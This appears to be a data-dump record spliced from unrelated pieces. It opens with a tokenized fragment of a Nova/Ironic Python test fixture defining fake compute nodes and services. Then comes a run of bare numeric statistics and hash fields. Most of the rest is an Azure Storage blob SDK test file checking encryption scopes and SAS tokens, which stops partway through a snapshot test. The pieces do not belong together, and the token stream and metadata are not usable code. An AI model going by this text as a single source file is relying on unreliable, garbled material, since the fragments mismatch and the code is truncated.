nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'40'
op|','
name|'free_ram_mb'
op|'='
number|'4096'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
comment|'# Broken entry'
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'5'
op|','
name|'local_gb'
op|'='
number|'50'
op|','
name|'memory_mb'
op|'='
number|'5120'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake'"
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'50'
op|','
name|'free_ram_mb'
op|'='
number|'5120'
op|','
nl|'\n'
DECL|variable|hypervisor_hostname
name|'hypervisor_hostname'
op|'='
string|"'fake-hyp'"
op|')'
op|','
nl|'\n'
op|']'
newline|'\n'
nl|'\n'
DECL|variable|SERVICES
name|'SERVICES'
op|'='
op|'['
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host1'"
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host2'"
op|','
name|'disabled'
op|'='
name|'True'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host3'"
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host4'"
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|get_service_by_host
name|'def'
name|'get_service_by_host'
op|'('
name|'host'
op|')'
op|':'
newline|'\n'
indent|' '
name|'services'
op|'='
op|'['
name|'service'
name|'for'
name|'service'
name|'in'
name|'SERVICES'
name|'if'
name|'service'
op|'.'
name|'host'
op|'=='
name|'host'
op|']'
newline|'\n'
name|'return'
name|'services'
op|'['
number|'0'
op|']'
newline|'\n'
dedent|''
endmarker|''
end_unit
| 12.723958
| 88
| 0.611543
| 1,528
| 9,772
| 3.806937
| 0.107984
| 0.102114
| 0.065326
| 0.06034
| 0.828434
| 0.802304
| 0.740416
| 0.716349
| 0.692281
| 0.686608
| 0
| 0.021305
| 0.092202
| 9,772
| 767
| 89
| 12.740548
| 0.634427
| 0
| 0
| 0.94133
| 0
| 0
| 0.375768
| 0.028039
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001304
| 0
| 0.001304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7bdd9b5f6f856c7ea2e4df64224e881ecb83b36
| 48,761
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
from datetime import datetime, timedelta
from azure.core.exceptions import HttpResponseError
from azure.storage.blob import (
BlobServiceClient,
BlobType,
BlobBlock,
BlobSasPermissions,
ContainerEncryptionScope,
generate_blob_sas,
generate_account_sas, ResourceTypes, AccountSasPermissions, generate_container_sas, ContainerSasPermissions
)
from settings.testcase import BlobPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
# The encryption scope are pre-created using management plane tool ArmClient.
# So we can directly use the scope in the test.
TEST_ENCRYPTION_KEY_SCOPE = "antjoscope1"
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
default_encryption_scope="containerscope")
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = {
"default_encryption_scope": "containerscope",
"prevent_encryption_scope_override": True
}
TEST_SAS_ENCRYPTION_SCOPE = "testscope1"
TEST_SAS_ENCRYPTION_SCOPE_2 = "testscope2"
# ------------------------------------------------------------------------------
class StorageCPKNTest(StorageTestCase):
def _setup(self, bsc):
self.config = bsc._config
self.container_name = self.get_resource_name('utcontainer')
# prep some test data so that they can be used in upload tests
self.byte_data = self.get_random_bytes(64 * 1024)
if self.is_live:
try:
bsc.create_container(self.container_name)
except:
pass
def _teardown(self, bsc):
if self.is_live:
try:
bsc.delete_container(self.container_name)
except:
pass
return super(StorageCPKNTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name("cpk")
def _create_block_blob(self, bsc, blob_name=None, data=None, encryption_scope=None, max_concurrency=1, overwrite=False):
blob_name = blob_name if blob_name else self._get_blob_reference()
blob_client = bsc.get_blob_client(self.container_name, blob_name)
data = data if data else b''
resp = blob_client.upload_blob(data, encryption_scope=encryption_scope, max_concurrency=max_concurrency, overwrite=overwrite)
return blob_client, resp
def _create_append_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_append_blob(encryption_scope=encryption_scope)
return blob
def _create_page_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_page_blob(1024 * 1024, encryption_scope=encryption_scope)
return blob
# -- Test cases for APIs supporting CPK ----------------------------------------------
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_and_put_block_list(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc)
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('2', b'BBB', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('3', b'CCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_put_block_and_put_block_list_with_blob_sas(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_name = self._get_blob_reference()
token1 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
)
blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
.get_blob_client(self.container_name, blob_name)
blob_client.stage_block('1', b'AAA')
blob_client.stage_block('2', b'BBB')
blob_client.stage_block('3', b'CCC')
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = blob_client.commit_block_list(block_list)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_put_block_and_put_block_list_with_blob_sas_fails(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_name = self._get_blob_reference()
token1 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
)
blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
.get_blob_client(self.container_name, blob_name)
# both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
with self.assertRaises(HttpResponseError):
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# both ses in SAS and encryption_scopes are both set and have SAME values will succeed
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
# Act
block_list = [BlobBlock(block_id='1')]
# both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
with self.assertRaises(HttpResponseError):
blob_client.commit_block_list(block_list, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# both ses in SAS and encryption_scopes are both set and have SAME values will succeed
put_block_list_resp = blob_client.commit_block_list(block_list, encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
# generate a sas with a different encryption scope
token2 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
)
blob_client_diff_encryption_scope_sas = BlobServiceClient(self.account_url(storage_account_name, "blob"), token2)\
.get_blob_client(self.container_name, blob_name)
# blob can be downloaded successfully no matter which encryption scope is used on the blob actually
# the encryption scope on blob is TEST_SAS_ENCRYPTION_SCOPE and ses is TEST_ENCRYPTION_KEY_SCOPE in SAS token,
# while we can still download the blob successfully
blob = blob_client_diff_encryption_scope_sas.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAA')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_chunks(self, storage_account_name, storage_account_key):
# parallel operation
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Arrange
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_sub_streams(self, storage_account_name, storage_account_key):
# problem with the recording framework can only run live
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_single_chunk(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
data = b'AAABBBCCC'
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_from_url_and_commit_with_cpk(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# create source blob and get source blob url
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # Make sure using chunk upload, then we can record the request
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
# create destination blob
self.config.use_byte_buffer = False
destination_blob_client, _ = self._create_block_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act part 1: make put block from url calls
destination_blob_client.stage_block_from_url(block_id=1, source_url=source_blob_url,
source_offset=0, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
destination_blob_client.stage_block_from_url(block_id=2, source_url=source_blob_url,
source_offset=4 * 1024, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert blocks
committed, uncommitted = destination_blob_client.get_block_list('all')
self.assertEqual(len(uncommitted), 2)
self.assertEqual(len(committed), 0)
# commit the blocks without cpk should fail
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2')]
with self.assertRaises(HttpResponseError):
destination_blob_client.commit_block_list(block_list)
# Act commit the blocks with cpk should succeed
put_block_list_resp = destination_blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
# Act get the blob content
blob = destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data[0: 8 * 1024])
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
for content in [b'AAA', b'BBB', b'CCC']:
append_blob_prop = blob_client.append_block(content, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block_from_url(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # chunk upload
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
destination_blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = destination_blob_client.append_block_from_url(source_blob_url,
source_offset=0,
source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data[0: 4 * 1024])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_append_blob_with_chunks(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_page(self.byte_data,
offset=0,
length=len(self.byte_data),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page_from_url(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # Make sure using chunk upload, then we can record the request
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_pages_from_url(source_blob_url,
offset=0,
length=len(self.byte_data),
source_offset=0,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_page_blob_with_chunks(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = bsc.get_blob_client(self.container_name, self._get_blob_reference())
page_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.PageBlob,
max_concurrency=2,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_get_set_blob_metadata(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
blob_props = blob_client.get_blob_properties()
# Assert
self.assertTrue(blob_props.server_encrypted)
self.assertEqual(blob_props['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act set blob properties
metadata = {'hello': 'world', 'number': '42', 'up': 'upval'}
with self.assertRaises(HttpResponseError):
blob_client.set_blob_metadata(
metadata=metadata,
)
blob_client.set_blob_metadata(metadata=metadata, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
blob_props = blob_client.get_blob_properties()
md = blob_props.metadata
self.assertEqual(3, len(md))
self.assertEqual(md['hello'], 'world')
self.assertEqual(md['number'], '42')
self.assertEqual(md['up'], 'upval')
self.assertFalse('Up' in md)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_snapshot_blob(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act without cpk should not work
with self.assertRaises(HttpResponseError):
blob_client.create_snapshot()
# Act with cpk should work
